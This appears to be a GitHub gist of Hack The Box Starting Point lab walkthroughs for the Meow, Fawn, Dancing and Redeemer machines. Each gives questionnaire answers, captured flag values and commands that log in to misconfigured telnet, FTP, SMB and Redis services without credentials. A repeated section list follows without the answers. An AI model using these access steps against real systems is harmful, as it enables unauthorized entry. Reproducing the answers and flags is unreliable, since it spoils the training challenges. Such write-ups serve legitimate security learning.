Meow

Questionnaire

What does the acronym VM stand for?

Virtual Machine

What tool do we use to interact with the operating system in order to issue commands via the command line, such as the one to start our VPN connection? It's also known as a console or shell.

terminal

What service do we use to form our VPN connection into HTB labs?

openvpn

What is the abbreviated name for a 'tunnel interface' in the output of your VPN boot-up sequence output?

tun

What tool do we use to test our connection to the target with an ICMP echo request?

ping

What is the name of the most common tool for finding open ports on a target?

nmap

What service do we identify on port 23/tcp during our scans?

telnet

What username is able to log into the target over telnet with a blank password?

root

Submit root flag

b40abdfe23665f766f9c61ecba8a4c19

Commands

Scan

$ rustscan -a 10.129.43.238

PORT   STATE SERVICE REASON
23/tcp open  telnet  syn-ack

Telnet

$ telnet -l root 10.129.43.238

Trying 10.129.43.238...
Connected to 10.129.43.238.
Escape character is '^]'.
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

Fawn

Questionnaire

What does the 3-letter acronym FTP stand for?

File Transfer Protocol

Which port does the FTP service listen on usually?

What acronym is used for the secure version of FTP?

SFTP

What is the command we can use to send an ICMP echo request to test our connection to the target?

ping

From your scans, what version is FTP running on the target?

vsftpd 3.0.3

From your scans, what OS type is running on the target?

Unix

What is the command we need to run in order to display the 'ftp' client help menu?

ftp -h

What is username that is used over FTP when you want to log in without having an account?

anonymous

What is the response code we get for the FTP message 'Login successful'?

There are a couple of commands we can use to list the files and directories available on the FTP server. One is dir. What is the other that is a common way to list files on a Linux system.

ls

What is the command used to download the file we found on the FTP server?

get

Submit root flag

035db21c881520061c53e0536e44f815

Commands

Scan

$ rustscan -a 10.129.86.28 -- -sC

PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.15.27
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status

File

$ ftp -p [email protected]
Connected to 10.129.86.28.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
227 Entering Passive Mode (10,129,86,28,155,118).
150 Here comes the directory listing.
-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
226 Directory send OK.
ftp> get flag.txt
227 Entering Passive Mode (10,129,86,28,215,181).
150 Opening BINARY mode data connection for flag.txt (32 bytes).
226 Transfer complete.
32 bytes received in 0.000266 seconds (117 kbytes/s)
ftp> quit
221 Goodbye.

Dancing

Questionnaire

What does the 3-letter acronym SMB stand for?

Server Message Block

What port does SMB use to operate at?

What is the service name for port 445 that came up in our Nmap scan?

microsoft-ds

What is the 'flag' or 'switch' we can use with the SMB tool to 'list' the contents of the share?

-L

How many shares are there on Dancing?

What is the name of the share we are able to access in the end with a blank password?

WorkShares

What is the command we can use within the SMB shell to download the files we find?

get

Submit root flag

5f61c10dffbc77a704d76016a22f1664

Commands

Scan

$ rustscan -a 10.129.1.203

PORT      STATE SERVICE      REASON
135/tcp   open  msrpc        syn-ack
139/tcp   open  netbios-ssn  syn-ack
445/tcp   open  microsoft-ds syn-ack
5985/tcp  open  wsman        syn-ack
47001/tcp open  winrm        syn-ack

$ smbclient --no-pass -L 10.129.1.203

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	WorkShares      Disk

File

$ smbclient --no-pass //10.129.1.203/Workshares

smb: \> ls
  .                                   D        0  Mon Mar 29 10:22:01 2021
  ..                                  D        0  Mon Mar 29 10:22:01 2021
  Amy.J                               D        0  Mon Mar 29 11:08:24 2021
  James.P                             D        0  Thu Jun  3 10:38:03 2021

		5114111 blocks of size 4096. 1732425 blocks available
smb: \> cd James.P
smb: \James.P\> ls
  .                                   D        0  Thu Jun  3 10:38:03 2021
  ..                                  D        0  Thu Jun  3 10:38:03 2021
  flag.txt                            A       32  Mon Mar 29 11:26:57 2021

		5114111 blocks of size 4096. 1732424 blocks available
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \James.P\> quit

Redeemer

Questionnaire

Which TCP port is open on the machine?

Which service is running on the port that is open on the machine?

redis

What type of database is Redis? Choose from the following options: (i) In-memory Database, (ii) Traditional Database

In-memory Database

Which command-line utility is used to interact with the Redis server? Enter the program name you would enter into the terminal without any arguments.

redis-cli

Which flag is used with the Redis command-line utility to specify the hostname?

-h

Once connected to a Redis server, which command is used to obtain the information and statistics about the Redis server?

info

What is the version of the Redis server being used on the target machine?

5.0.7

Which command is used to select the desired database in Redis?

select

How many keys are present inside the database with index 0?

Which command is used to obtain all the keys in a database?

keys *

Submit root flag

03e1d2b376c37ab3f5319922053953eb

Commands

Scan

$ rustscan -a 10.129.70.165

PORT     STATE SERVICE REASON
6379/tcp open  redis   syn-ack

Version

$ redis-cli -h 10.129.70.165 info | grep redis_version

redis_version:5.0.7

Keys

$ redis-cli -h 10.129.70.165 -n 0 keys '*'

1) "numb"
2) "flag"
3) "temp"
4) "stor"

Flag

$ redis-cli -h 10.129.70.165 -n 0 get flag

"03e1d2b376c37ab3f5319922053953eb"

tboerger/README.md

Meow

Questionnaire

What does the acronym VM stand for?

What tool do we use to interact with the operating system in order to issue commands via the command line, such as the one to start our VPN connection? It's also known as a console or shell.

What service do we use to form our VPN connection into HTB labs?

What is the abbreviated name for a 'tunnel interface' in the output of your VPN boot-up sequence output?

What tool do we use to test our connection to the target with an ICMP echo request?

What is the name of the most common tool for finding open ports on a target?

What service do we identify on port 23/tcp during our scans?

What username is able to log into the target over telnet with a blank password?

Submit root flag

Commands

Scan

Telnet

Fawn

Questionnaire

What does the 3-letter acronym FTP stand for?

Which port does the FTP service listen on usually?

What acronym is used for the secure version of FTP?

What is the command we can use to send an ICMP echo request to test our connection to the target?

From your scans, what version is FTP running on the target?

From your scans, what OS type is running on the target?

What is the command we need to run in order to display the 'ftp' client help menu?

What is username that is used over FTP when you want to log in without having an account?

What is the response code we get for the FTP message 'Login successful'?

There are a couple of commands we can use to list the files and directories available on the FTP server. One is dir. What is the other that is a common way to list files on a Linux system.

What is the command used to download the file we found on the FTP server?

Submit root flag

Commands

Scan

File

Dancing

Questionnaire

What does the 3-letter acronym SMB stand for?

What port does SMB use to operate at?

What is the service name for port 445 that came up in our Nmap scan?

What is the 'flag' or 'switch' we can use with the SMB tool to 'list' the contents of the share?

How many shares are there on Dancing?

What is the name of the share we are able to access in the end with a blank password?

What is the command we can use within the SMB shell to download the files we find?

Submit root flag

Commands

Scan

Shares

File

Redeemer

Questionnaire

Which TCP port is open on the machine?

Which service is running on the port that is open on the machine?

What type of database is Redis? Choose from the following options: (i) In-memory Database, (ii) Traditional Database

Which command-line utility is used to interact with the Redis server? Enter the program name you would enter into the terminal without any arguments.

Which flag is used with the Redis command-line utility to specify the hostname?

Once connected to a Redis server, which command is used to obtain the information and statistics about the Redis server?

What is the version of the Redis server being used on the target machine?

Which command is used to select the desired database in Redis?

How many keys are present inside the database with index 0?

Which command is used to obtain all the keys in a database?

Submit root flag

Commands

Scan

Version

Keys

Flag

Explosion (VIP)

Preignition (VIP)

Mongod (VIP)

Synced (VIP)

amos-techy commented Feb 28, 2024